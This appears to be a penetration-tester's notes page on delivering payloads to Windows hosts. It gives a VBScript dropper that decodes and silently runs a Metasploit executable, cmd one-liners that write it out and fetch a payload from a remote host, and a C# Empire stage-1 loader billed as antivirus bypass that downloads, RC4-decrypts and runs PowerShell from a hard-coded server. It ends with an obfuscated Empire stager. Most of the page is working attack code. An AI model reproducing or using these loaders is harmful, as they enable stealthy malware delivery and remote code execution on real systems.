oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
set oXMLDoc = nothing
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempdir
Dim basedir
Set tempdir = fso.GetSpecialFolder(2)
basedir = tempdir & "\" & fso.GetTempName()
fso.CreateFolder(basedir)
tempexe = basedir & "\" & "test.exe"
Dim adodbstream
Set adodbstream = CreateObject("ADODB.Stream")
adodbstream.Type = 1
adodbstream.Open
adodbstream.Write decode
adodbstream.SaveToFile tempexe, 2
Dim wshell
Set wshell = CreateObject("Wscript.Shell")
wshell.run tempexe, 0, true
fso.DeleteFile(tempexe)
fso.DeleteFolder(basedir)
Ok, how to run it in cmd.exe ? Do you want to paste the code line by line ? A simple command is created as follow:
upload msf.vbs to vuln lab with a single command,
echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs
execute metasploit payload with msf.vbs and cscript.exe
C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>
Bypass nc shell buffer size limit
If the script is used in cmd.exe on localhost, everything goes well. But if it is used in netcat cmd shell, the payload will be broken. ex:
C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.
C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
- origin payload size: 6160
- netcat handle payload size: 4068
Pleae try it yourself, For security tests, another vbs script is created.
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs
Run the following command to execute your vbs payload:
START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt
ByPassAV Empire-PowerShell part 1
using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace PSEmpire_Stage1
{
class Program
{
// RC4 Class to decrypt the stage 2 data
// Created by Jeong ChangWook. Source https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4
public class RC4
{
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
}
// Hide Windows function by our friends from StackOverFlow
// https://stackoverflow.com/questions/34440916/hide-the-console-window-from-a-console-application
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
static void Main(string[] args)
{
// To Hide the ConsoleWindow (It may be a better way...)
var handle = GetConsoleWindow();
ShowWindow(handle, 0);
// Avoid sending Expect 100 Header
System.Net.ServicePointManager.Expect100Continue = false;
// Create a WebClient Object (No Proxy Support Included)
WebClient wc = new WebClient();
string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
wc.Headers["User-Agent"] = ua;
wc.Headers["Cookie"] = "session=968PH6bE9CDkwYGfsUPraz0x5PQ=";
// Set the Server Address and URL
string server = "http://192.168.6.119:8081";
string target = "/CWoNaJLBo/VTNeWw11212/";
// Download The Data or Stage 2
byte[] data = wc.DownloadData(server + target);
// Extract IV
byte[] iv = data.Take(4).Select(i => i).ToArray();
// Remove the IV from the data
byte[] data_noIV = data.Skip(4).ToArray();
// Set Key value for decryption. PowerEmpire StageingKey value
string key = "fdcece0a22c10f83dccc8f17c95a33d4";
byte[] K = Encoding.ASCII.GetBytes(key);
// Combine the IV + Key (New random key each time)
byte[] IVK = new byte[iv.Length + K.Length];
iv.CopyTo(IVK, 0);
K.CopyTo(IVK, iv.Length);
// Decrypt the Message
byte[] decrypted = RC4.Decrypt(IVK, data_noIV);
// Convert the stage2 decrypted message from bytes to ASCII
string stage2 = System.Text.Encoding.ASCII.GetString(decrypted);
// Create a PowerShell Object to execute the command
PowerShell PowerShellInstance = PowerShell.Create();
// Create the variables $ser and $u which are part of the downloaded stage2
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("ser", server);
PowerShellInstance.Runspace.SessionStateProxy.SetVariable("u", ua);
// Add the Script Stage 2 to the Powershell Object
PowerShellInstance.AddScript(stage2);
// Execute the Script!
PowerShellInstance.Invoke();
}
}
}
compile:
csc.exe PSEmpireStage1.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
For more details see video
ByPassAV Empire-PowerShell part 2
"[SYsTem.NET.SErvIcePOInTMANAgER]::EXPecT100CONtiNuE=0;$WC=NEW-OBjECT SYstem.NeT.WEBCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)
like Gecko';$WC.HeAdErS.Add('User-Agent',$u);$WC.PRoxY= [SYStem.NEt.WEbREqUEsT]::DEfaulTWEBPrOxY;$WC.ProxY.CreDEnTials = [SySTEm.NET.CreDenTIalCache]::DeFAUltNETWOrkCReDentIALs;$Script:Proxy = $wc.Proxy;$K= [SYStEm.TeXT.ENCodiNG]::ASCII.GEtBytES('JV+~fgh!GFWZ8=eiEN{[#}&x_XLtHKT7');$R= {$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J-(-$S[$_])- (-$K[$_%$K.CoUnt]))%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H= ($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_- bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://172.16.3.77:80';$t='/news.php';$Wc.HEaDERs.AD joIN[ChAr[]](& $R $datA ($IV+$K))|IEX"